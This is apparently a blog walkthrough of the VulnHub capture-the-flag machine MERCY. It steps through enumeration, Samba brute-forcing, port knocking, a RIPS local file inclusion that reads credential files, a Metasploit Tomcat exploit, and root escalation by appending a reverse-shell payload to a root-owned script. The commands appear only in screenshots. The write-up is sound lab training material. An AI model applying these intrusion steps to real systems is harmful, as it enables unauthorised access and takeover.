MERCY
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAFrzbiabNbGeQK4mhe-Iqs5sReTZzuQou5AIcYmwIsSKbL6s2HMzFAUCwLLRwlW7XPdpIxpIo87tU5rs97SQytNlLHfK7nJyIduWYQzHxsA2HQbHdRRcM83ujfejWbPqQ6q3WWK6a0oF/s1600/screenshot.47.jpg)
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine MERCY.
- MERCY can be found here:
https://www.vulnhub.com/entry/digitalworldlocal-mercy,263/
- Once downloaded and extracted with VirtualBox:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC5HgkqwYT41O_wHDQamS2tmToacBsXB-Ld7kUkcqZ1OjPnQgQEt9ekgCAXBAzm1I0zcB2eoN_ia-mYTfyyL2I2hHeE3H3HeQRcCGzgnHpHrhM8yvLMLf1B_QMPgihzDHHwVd4cTU71oNw/s400/screenshot.1.jpg)
2 - ENUMERATION
- Discovering MERCY's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaF3sx3nrx0DfAyU2XPfEcp4gNKBTqYiQGz5T9rSXA4MPgURj8IZUEs_ery7OF-je8BrQo0cEtaKXCPqVd23VpPcHDkavDcpc4NW9K2LkJlgNHZAxOi2fov8yA_0WQK-7S850jjF862WC3/s1600/screenshot.2.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3sx4nTsXpg7M0K__Sk0rcNWMXcCpjOdZixC0ANoEbjhEpIVPgVHkM-6AtifWKwZNUFGuzlCU5Ry0hyphenhyphennNARR_Hn8exGNnvczdAdirEC9OAMAuz3ZCjO4mnemckevEukMK-Z2PLON3u7gUe/s1600/screenshot.3.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvD9KgCqSWkSYCIKAZqomx7Yn_7zvpMdwgzsEqBIY5k-SLCtlUngQ6WRk-RvioSnTBdhrifhokxX9KJd0aZCplXpsPR0jSfpZRnlxCNXfaUo1J_Js6fZSuq8ZEuBjRFGG5rOIyM5WH9F2y/s1600/screenshot.4.jpg)
- Going deeper within port 8080 HTTP, it seems that Apache Tomcat/Coyote engine JSP 1.1 is being run:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIkc0_ro8Z-jeFkaAQ19gRHm0NbSOMpb37dleYn_RWUdWvl_yGtE729Kj06HLbOBXfOpKXFIhRiK2ksd3lia1AikmEKQGCysJTsbChe7ZZvhEDl4hzST6Yhp2gmKn1r_UaNexAMYOof_r/s1600/screenshot.5.jpg)
- Dirbusting the web server at port 8080:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvdK72Pwsuu856ncV0N2CPwdBy7Um0SUZGgPjy0wSpJbwfk1rjlNf22jssrevGiC2xGjSyRbPhCiHGX6C3gpLmoG5bdPRNHbFJUbjNPM7wT6JNjaXgioABeeUUmHY4zmTpF4o7OthGdzE/s1600/screenshot.9.jpg)
- So we have some interesting folders to explore, like robots.txt, /tryharder/tryharder and /manager.
- Connecting with the browser:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkOSlpl5Rft_4zrDU9x1ApWIBob9mIdFvsRVIdxN1uL7Z8O3-sGBrvg3Y3GZ7u9YK0ZH-rXt6F1qSPPPtnFNQw6_cqQM5vkt0xPQIVJDVL7feFkDCFqRFGVDbgGKkR8cc6dq-qSYbTtJS/s1600/screenshot.6.jpg)
- Reading robots.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMh6jfJIDUOr4e0ketfTPJ4ymhQBmGQ9x51KKYpfC0EKU0DL3iLihGk2yuwBES2Tgf4C91I9YYSCZ1SiVwZytZbwmHWNwXhauP9Z9WiqMQpM8lLX_sNcutgdO5hbwDy-bD_t4UkDw_RINi/s1600/screenshot.67.jpg)
- Checking folder /tryharder/tryharder we find a string encoded with Base64:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTQHq2a1jDWd1g-aztlgLpkl8EqkNIAy0nQGXajqQgBbeH5Xxnj2pODjYhSCeSelFFMFJNb-qt7eOQnXUUEtfI_H1yTkKoZnBYRetbfigEiVxPt1_kGlNQNSpsz1S4UAUOxAsOQO6juek0/s1600/screenshot.7.jpg)
- Decoding:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaPcDyQmut3lRMEnOjksA_N9mHA5i45LgS4ezXvHj4ntJtEruv3oKsHupzPPFEO2IklGV5kzf1jgF51S58oq8sgENw1FU9oB3MuQo9r2rkONLHnzCSVdyvJPfU5XyWTR8wFHs0Ucjt94Uv/s1600/screenshot.8.jpg)
- From the message we can write down that it might be a use with password password.
- Going to /manager:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmouyJAbiXS40vKWVNgvGoPrGH1uxnEUAsrNEaDd9dK2i2Oo17vQ8DL475FobWYL2BU2SmY9wHgqwAmklHsbW_Ob5KyH4O2ETAt4Wc0QEdo1ztcAcVxXF_71VrSdiKpp5vNqOz2sKHRbX7/s640/screenshot.10.jpg)
- Also, port 445 is open, so why not enumerating with enum4linux taking advantage of the Samba server?
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKUO_BqwQbOmQSU0k1S6jsNrkRJqHAAOdKf9wIL2viiGT1TA4erVnVE1Yb2JwN5S5IxmxfwAVeQD1wpGjR-wo3mWjH5gI7WB232yJCTU2NbbIZyoZC7jSOc6c25BDgtaF5GsT40ludJO-/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTeG4fq_ezCEbkCvL-jFRHAlSWywm0AMI_g1vNC8lJPcpFRQC2-1OSOsG9D0KpV3OjurvjDSZgpiVvkzL_CQkGEuqyEvJEDuTGg6IJ9qh60VlFL02s2tmQHjKUnzp1HLrp3ourb5f378YA/s1600/screenshot.12.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWV-V7xQjYuSqdoyfZ5k_jvWhy5j_vcyhdezasIyeaSHohjQHi0MOfqURfKISJwFC3k-HQTun-rnSHFR57VGb2tdmWVb3uy-TGJ5TaN_vAR9fOqD4JcFlT8B44kJpYIrHAO_3BZoqEMBPx/s1600/screenshot.13.jpg)
- So there are 4 Local Users: pleadformercy, qiu, thisisasuperduperlonguser, fluffy.
- Launching Hydra over the Samba server with the text file usernames and the wordlist rockyou.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHadyLaRhyYRdsTWC6c1zzzzfcWoL5tUnfarR2pslwHYrevFSnuKCNkzNR3TipjWFhQQQEiWFJMN6UP00S-VWU1xDfZjfdLqd7hXIdoLAQqDshj7hvBMoxJFiKOpwQufO2p6tmQrg5CutV/s320/screenshot.70.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtGnDfLxLDGHUhJ0Ak8L4GlXP8p7SpwL0Ks-H1kQvyHdmhae0SsQspB1nNLjUmuB3QWEnUU44fra6y6nD8tOEFeWlyY6n7UEwQbpom6er2vIpJngR3KZPBRWUNwFhNMVmaGLrV4mAseyZQ/s1600/screenshot.69.jpg)
- Connecting to the Samba server with credentials qiu:password" (remembering the Base64 decoded string):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp48fCOAQ40Xmszr87T0NUWfL6rE_oZGY5vxtIUHY7U-ANQ6a8joEnaB2-WAOzVAluyqV3y4z0OJpzNUjjddfZ51Bxf62qqHkuGaGVQ8xs639ghmU6hWnI_fPrS302SQOAZDMLU9WUNjj6/s1600/screenshot.14.jpg)
- Listing contents:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5Atfg7tT_VBpurqlKiJH7trDcN7IAhKgTHYln-iltekPUWXLsU41fpt3Ylknoi1562o1XBYRRPnuOpdQnANCoXvAW6fvxDAEIX-6SdIk2AYZ8w6HBTd3b-oWoh-DVUl1cUcaHw4iEaHp8/s1600/screenshot.15.jpg)
- Getting .bash_history:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZJT23aAOydKVOThf8WGAEGLhzh05U8PNKuu9jFnZXZUQv7WL9lGUqybVbQ3c2REXkJF35crRGrHOIXG-H3P7GIaj9plgXhjywrZrEL8gFyYl2WJW799IBDxr1pXscQ6FG-q6d4ZZPCOK-/s1600/screenshot.17.jpg)
- Goint to folder .private:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEphrnIkZDJCM7K-Hmi9ndhwqc48Uzvp1gZ3gmyzAX5go6wXz-apASEL22YSquTtpGoG84QKZjoHs2jnhmvnwegxexZKHgNVXl3SBUgfNYBB3WcxfVwwQflDY38hLNrFxCRMDZMR6piSbD/s1600/screenshot.16.jpg)
- Getting readme.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPgsHzE6A7w8TKQnmAttxo1j3YF94sjdt5tKYsG_okkxI2SFTzY9SFTuEc7-QW6TCir0PJubrujF6DWjRInBJig4ox_RaqBW5l36McXdNdfIXwx8pPXCUKIFG4VAw4QVATk2vuXUFJhBfX/s1600/screenshot.19.jpg)
- Going to secrets there is nothing inside:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlwRi5sGowZtYQWpqvihcW1hb2daLQ-DlIm9k1wMgOPN6nnV7Xc_Nm1vtCLjjYZ0rRGpflRZ_VV1m5sjH69lALcx8AM6CTpUnSxrl2p-C2MOFaogYP2H_iXo3pVbmjbK3t-AGyJhMBxIAe/s1600/screenshot.21.jpg)
- Going to folder opensesame and getting configprint and config:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixHJ6hV5n185jzyxKKH_8XBBVcgEQkmHBl8AXw9Dv6C-QMLNT9v7W3qRcY4acJ0zcvcrfiiWhwtsWSJD-Vf7_I3_yEKuBCsXWLGZi8-pWMZiOmX9rWAYHak1Yk26R05ldrCxv3mGt4AM2K/s1600/screenshot.20.jpg)
- Reading .bash_history:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLf7BbQR_8tcr5UEU6Hw7Zoa89aOnYQJW_Gy9Hca9eST0omOtzc0IEnjyCOq7ZGvwexjpfJhzGeZuHB-vjL9f6jwgdei8BMLFASMShAdPsAql7iaOVE3Jn_T_1W63awRWDKFAyi9RBtZv/s1600/screenshot.22.jpg)
- Reading readme.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZmgbD6YhFhfmfqz5_kynDABlDizj6Hi6kQybEtzuHWbs5SB9IdGBpX-tjbqX5Y7V6dAUY-vPCxuuNpYznGqhcY9DgrjZsLdb2xZzMmmhHHK9zws-rVLYiTEUWJFs6Tt0-Sg0sggKAGH0/s1600/screenshot.23.jpg)
- Reading configprint, there are a lot of references to config:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4oasU1rE7fUB0FCY-VLmwZchCxSXftflrdvqPwxBc77ca7jrD1afgzJPcn0Lug3elaD67dWVUWI5ct9s4iiIAqi9Uf6l6u75q5BayG-S-mtYT29OkVN7gBCOolLgcVEBkXyef1bPayhW5/s1600/screenshot.24.jpg)
- Reading config we find information about filtered services HTTP at port 80 and SSH port 22:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrWIhDHd07SiPcxiK3ipFaRyLL3q60i0W38onL2aWy8PqUXLKMZUH1G_zxW-N0hjrv07fiyESrKbCrhNFBa7JBNDrpseaEa6NhcoQt_g0F6kQtA5U-cJ6PUsuE6fO8dLe9qI05gC9DPYz_/s1600/screenshot.25.jpg)
- Actually both ports 22, 80 are filtered:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIUCL-ksz-qdoyK3Ei3kC6ziVU4Lr4Muu77rK5iZVefXAwoNTp3Q5wfDAwkPSGwxWTe_M4WNd2G_6Jq4EvCV1C9I-lR18hX7pyV3v9CXqKehjijn8M3WTJncrVgtJamlZqDiszsYspY_41/s1600/screenshot.71.jpg)
- Because several sequences are quoted we can imagine that knock command must be used to open filtered services, for instance HTTP port 80:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyBeYs1-zs4pARJ4Zw-jipaWRtpzX-IQSrBtE-4V_cPUdQHAVGNEbzAr8V-yCg0966PzQqrjBdquxyXSAdrubB6yVqBDxaZk3ilcRKEa0yUqXUGLcA1C2YJ2vU0MlzdZYMqy4OWjbPEc_/s1600/screenshot.27.jpg)
- Same thing for SSH port 22:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEewXM6gjqK2og3r5aXmJq22PF1eZQB4KXn1vWf7a-yT7VeN14gQQJWUDFimxw0T4ZDJ9ZaadJbapo4l8K4es0QbbfI_rhjBJSsYNGBq9bAco2dFaK82Gy7Akih7htoghy2pDk4emrN3PO/s1600/screenshot.72.jpg)
- Now, connection with the browser is available:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivlYEaxr7jfn7ca4RUP_j2hoZT7pu7jZkwNy8n3Hu79Qj_ZBHRbnjOiNC2RN_hIPIP8m4Mrff-_uIfx18RbSBGVndT1aAttgKMqCoMMJu5N7qSxna2JoC6TFBLe8c5kF5RmO0vU52YQAeT/s1600/screenshot.28.jpg)
- Dirbusting port 80:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGB_lhsz6RhzJNlSkuK7GgJqtffDDT7sT-04gvoNAFOo5ManKqn-qAgeZ54Fh4E8zZEFTwWdJE2G5GrlD10KTQZiUh1tWtMcAR_wE4PuSfhLLCYv9tQ6aKhwarOPsZoK06NHrs8DU8XZFs/s1600/screenshot.29.jpg)
- Reading robots.txt we discover two additional folders: /mercy and /nomercy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5katDLGk9FDwIvBLxbRzBjPL6H0qKKiPeSzxeZn8mkDB_KFvtYxtFMHahuRQEAFotMm7Hmy9HxwI2W9qIYgqunV0BUulqbi3bLgDf_k3hklMoq3p2_zFbGXXk4_PzsltdAqLcUaI95dEp/s1600/screenshot.30.jpg)
- Going to /mercy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75Mrt1O7fHjuAdJdwSq5LauN5aqnZrD_HnNxF67OaB13xdrtfHRkFHeN2-KroEnmP9xeLfrucXM40ypMpUWrjEi42r9i7uB0LjgVy45c8zkfSODBksVggKxF9qIa9T8q35MagADsVgrj5/s640/screenshot.31.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3SBu_z89a976BrZ4W-g3MZgBOS7Mfl34HnpcZRbJiw3QYKTjVfdvjUAj772Q0Ir8e5dlfQz387Mp6rND0x2mtHVMOV8bc_VrZbSbCzjJtBTslEf9S2K8pcQtSB049KzEgJnyphAp9RkLx/s1600/screenshot.32.jpg)
- Going to /nomercy the RIPS 0.53 application is running:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij8oR29d-z-mXin69y4v7CpF40jw6qs0m63xuAM2o_LFv5QBq-mNsjxQiM13uWKxz1DYwuH1z3rhvz5W0gSx5iUm48CBjTKhj9tbY-zs4xchfPD0WOdkWNGGjI2XPXu6rKsSwQA7Xe-EmD/s1600/screenshot.33.jpg)
3 - EXPLOITATION
- Searching for RIPS exploits we find a Multiple LFI exploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgewSB4u0WzuHFDFqtogeWWMa2QFilv5V0rhefnuYU7F-fD-p-oFr_igKHFNLeFGA_RxFUoQoU-36Ylhfbcou_YnjhZssrJT7VKYahBP-at5Awz0WgkAXeYxinOajXRN9t2g-07yahvs0b5/s1600/screenshot.34.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5DImFcKEsxryMdkrRE3PXXc-4q-EEkJg2UDOjaB-lqvVQ8dDJi__EoJJJaXcnmJPsEExB8oqZeD-WUQXEmjaQ3BMWX1aKlltKDLLanRU5_9Lo67LS_b9iqbl7DfqWWX4sAr7la-T6hw1V/s1600/screenshot.35.jpg)
- Reading 18660.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPwedd1wW-0YftASfZ7cCDAR6J9_bUDNoccpRqXoKc1q-sjairLMDN8Uu_ex-uzpIg-XrB7zauKKLLPqyP2uM9-xyAmrLTf9AR3djQGwiqtAyjSuqyGX1Uzgk32q3GNKLnpq_ybDzvyJh/s640/screenshot.36.jpg)
- Applying the LFI to /etc/passwd:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasvNFEpv_IQRDqBSgoartacgCvHCN-Nwx8FmeH1d2xb6ULGNtsIPSBjgCQSlFuclE4oO6m5wLbQ2RxNRV2mSrtOymRDSMPv6M3510Azyt7OPupHEWOGnr6Ipb8u58V-wGayBH5yc85o1V/s1600/screenshot.37.jpg)
- However it doesn't work with /etc/shadow:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeUpr7ftrGGjhBIz70dE3g3XAl9QnbXiOKYt88uJ5KhdExiKVaFar2an0Fz9hq7U8y25Qk9xUJH3aGO5kEy1U_xSH4Gl07UEZAkV168P8sfn4xXLNb2kq5dO5S9QG1VefcuGIPHKQeBES/s1600/screenshot.38.jpg)
- Remembering the existence of a tomcat-users.xml file:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCBKH3-5A9UUeCaO8YJaBlq_pZt2cW994QajyX4yO3A1tJ-HfurKfhPN6_ze0oLOB7lpuDO0k0TLT9BZF7i4Zf4Nfz0mV6gRq2sTsQq0PhE0FgJszcipxfKgWaU42bHrEyttqCRPbIe1Ud/s1600/screenshot.39.jpg)
- Extracting tomcat-users.xml:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ceR0t9a3R42SW1wM23DqeiFHvbTfnaZPPsrsLFerHkeFMu23wa5MYpflsc-Zh2CDzbhuxP_EJm27mjFYypHxGVnRwKzzc6ZtUwtiw35LwLPXkDgB8yb4jJi6-8j-KDHIUlMTxsr3mClF/s1600/screenshot.40.jpg)
- Last lines give unvaluable information about 2 users and correspondent usernames:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX1C-5NeO4n8SQ2l3XgWxGRw8S1SOBWzuDazAF-d5NCQ8YeNz75LYEPmGQclZy4DytL3K9y5p2-GgulsX3W0KrR3DPnFhQL4vDhxvh-fjwVdR0Jt3agnzZ0wso1MSB41DUkjh-WynAAKfm/s1600/screenshot.41.jpg)
4 - GETTING A SHELL WITH METASPLOIT
- Launching Metasploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR0PAYA53otu2HyI4pgRHHyDdt1GDDTClns2GbvdHF5vBJicjsd03y9-Isj7xR9IjO0sr9-Rt9mngqG6oa9KH9u6fOkKjQQPT2OxKpTBh1UCq8u30jD_NRqTMqBAJrh4bTIGcN6xJlYvx4/s1600/screenshot.42.jpg)
- Using this exploit for Tomcat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUYHL10JXrxNIHcE9wee86kbkv7CO7Smce0NDD7hgXQ-185UwEmdUysLIaBtjVbPxQF5CUeLx1uIHNlPmWaHJ9EmUX3s5jlRKtKEj7gw33_S87o8EYs-uPeGcnNJbrFyNWlBIvIz1MjIh1/s1600/screenshot.43.jpg)
- Setting options and running the exploit we get a Meterpreter session:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEc4zwsd9jHPzROyLbf8Dw2XPnYJVHqgfB6pptyaUhVNesN7vlhq0U6709WV6KJKZwImtCbr61jG4k4zUCUJ2WEMLuUHpre9Jm6wGwW5dKuCEA0ugqPFzhwrAOKggJ5MjT110RlrKngZOQ/s1600/screenshot.44.jpg)
- Spawning and improving a shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODZp8d8jRIB7zt5D71YrjyG_lyJFK-gmCTggjf2qGUux9gE1l63jkghPZfEtR8optimAv4soJJu63p-12ASOQVAEjH1oTK_2rCxFi312w206jIuoj39CYBuh_vb_Pr-3kqDB0sXR1jxdT/s1600/screenshot.45.jpg)
5 - PRIVILEGE ESCALATION
- Using credentials fluffy:freakishfluffybunny:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8VhynPtULOhx2VRAC8mKY8OUVIv0m1VnVqk6RrhgD2O7nSlMlkpd9xZgAVaPriwfBWt1DO3VsEXAP5o9lP44URHzJj7vhVrF5dXU5HRa1W5czLNYHphU9jUhbyuELExMOMJ4KZxLPXbw_/s1600/screenshot.48.jpg)
- Unfortunately fluffy is not a sudoer:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZHrUdRINE9MWcwJvV06TihnOYfyONUMQEoK5tqIAfV84DN_eXTXuX3S2zI_UJJRqb11Rk_SBH_A_g94gR4KqSDx19FRWdaoSPfGVmwKHm0dgsn1uijNK5BGrUtCEZQCryiAoVqN-W3kyP/s1600/screenshot.66.jpg)
- Improving the shell for fluffy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm-vFm6uiJ8qeKztY1oR5x4MLJazwsTsysIUbqwqueLK1nvr4py1irY_ieC4-ziymNPPN7RJKgFRLMloaCnmuTwpOUdigkxAyxDSVj6NqrEN8v5Z9EuuBkWsklh5gRto-40Np-P8wJhdmU/s1600/screenshot.50.jpg)
- Walking around into home folders and files until finding something useful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiprg9ZQW7zy4aSJwXXgP_mGcQHo5drGQBowFtSYMR9UjE6kbq-gEaQYk96jK_1ws6P0PgxMmhIHE0PdKmLc91inh03zHnFtdHOzkZMVjUmgcGSv98TgQ206tJWPjZxAbuqyAQfdm6xpMdr/s1600/screenshot.51.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjFwcnMzeTJlg0VzntZ_iqDd1LmSPPtpy3_iaJyWzzQl5f7942eb-gU4T3_HHXZN7krskYpiTzIRMk-dbNB5gNfiCwGKkywNpxlwktKE03hsRGNOOndd0f-y14-X82Rt10CMAKoMVCiKSq/s1600/screenshot.52.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC58MNbEYxZ05OUFvvqAGUfX0x-wUcs12Jv51gfxesWFkVESVSZyA1gBnYdwj88fLtF68coH9RaS9kjX6Og-uCe5YvcdYAs8y2H81yQmINZGr2zqfucMv-GqMLiGlXMtCpdELzqbuhmhlg/s1600/screenshot.53.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZsOT4JPJfzxEBIJho7yC7dLOUhZPV6FselVYK444V7aN_ghglkzAix8V2Joy5zY-Si-66E8iYkVND32RapWeVdv5RPsHy3XfnsFT-Q4PoHJDnhlcJyzTSjkSu_iGn07VMPYPoygvjZBHG/s1600/screenshot.54.jpg)
- Finally it seems that timeclok could be interesting, because it is a root owned script:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcTsPaTErqOugkdzhdUl3GHXNhaIhyB4_Xp1cnkYLatXJ7cu2aOgiB55kZOJSLAAJFy5VDq8-jpfhPAxbtejdRWsv6FHQ8XDRuY9gAKTAp_j-Nhi_OdBH6UrRuqIggFrhhOct1Mx8Hzaar/s1600/screenshot.61.jpg)
- Creating an exploit with Msfvenom:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEH_9orFIpPw0epBT-0xJPzWNs3eAM53zZOW1XncGevQ88jEPU_jlywj-Mmj0ghVvZ47Pfp6FyeM1oUkFlrTgn8nCUkaIr5gPOYkTfFCiznbVHOmsHodo_Xb7Ms92uI8NMpONT0E6CIlW0/s1600/screenshot.57.jpg)
- Setting a Netcat listener:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbXCeEHax0xkODWsp3uhc-aPcvcKtLkp0NQqlLXe5YbCd7ZZoFINgKTjZSZBKxxnenBZW73RVTk2unqziufajUk2OL-mmYJjQ5gWhblMRDn16s4qJC1CRm_Db3GmqOY89_hResusIndS78/s320/screenshot.60.jpg)
- Appending the exploit to timeclock:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjggbmgUqv-3rkdVP6RmCTOcaEQOOUhFKD9acBrGgr-6ifuhP3SaLG4W9bXmU5TEalDXaDoMTQgKAo0aTUKMzQv2yGtL5kx2USku4wrNZQVVwbNFAMpat6k1CILKtMb_TDl-8IAK8rhx3zE/s1600/screenshot.58.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFokVDvZmJj4mbPuc2hw9mrDuGZS1ApSftXxW84QHIPVQaA67uKNNbxLKydGvU9tR6byaH9roAGVlkpcgiqppJJYohMOH-8quzUeTzhZXVYHxOOGX3QXU3ckKWzdcN6y58dKGraxolI4su/s1600/screenshot.59.jpg)
- After some minutes we've got a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9UXFGvt9gT-TsKkia1XaEVNB1yRP51lr1nttuWTaLIJrkylg4GJAwxzqpvfI1ngOxru7dOzAJu9vaP-ZAd9pJY6nUo_By8WYpKtAi6JHfGn8iMyj7kpGy1lWK2oywfFJRIIqT2ifeAI9e/s1600/screenshot.62.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZE5r9WnQFDR7IX9PWVndH2BWqinMdbovosuf1p5TwDSI9hSxPDtx2nzM9nQBejop5YvVcyyXkqqO-S0P0Cj4HwJ6j1wuCXIqcNjFJM9FO3apDv-Zv3QkOD01tLAIkdVGxN6aE2iDW1Mto/s1600/screenshot.63.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQwte_do6UR90xHRb2dMmvYM3vFPbvhXQvF37J_vMoRJHI8dDs40k4vZxuN40A2b_4TAVnRUwxR7gfm7mIbau78BaZqKTcEdQeDqhLGzdEj3e-6Y34OPdrWkQWe7jY0LIRD7lo1FH9bB7R/s1600/screenshot.64.jpg)
6 - CAPTURING THE FLAG
- Reading proof.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Au5OdlKTOuoekz9KtX0O3PA4oVXQOd-rhM7ZrL5EABU2usbw0kA_EWyFKxhH07rVujr5hsg9nDNTEBP7xLDIJkxiOPw9SfToJYVwjjRtwrJDsL3MlnWdN4hareQvW9rrphaXenR37FVB/s1600/screenshot.65.jpg)